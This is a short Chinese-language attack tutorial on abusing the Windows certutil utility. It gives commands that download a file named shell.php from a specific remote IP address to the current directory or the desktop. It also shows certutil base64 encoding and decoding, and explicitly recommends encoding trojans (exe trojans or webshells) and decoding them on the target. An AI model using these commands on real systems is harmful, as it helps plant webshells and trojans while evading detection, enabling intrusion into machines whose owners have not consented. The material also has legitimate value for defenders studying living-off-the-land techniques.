certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。
远程下载 certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下 certutil -urlcache -split -f http://114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下载文件到指定目录下 文件base64编码解码 将a.txt文件base64编码为b.txtcertutil -encode a.txt b.txt将c.txt文件base64解码为c.txtcertutil -decode b.txt c.txt所以可以将木马base64编码后再解码。这里的木马可以是exe木马或者是webshell等任何文件均可。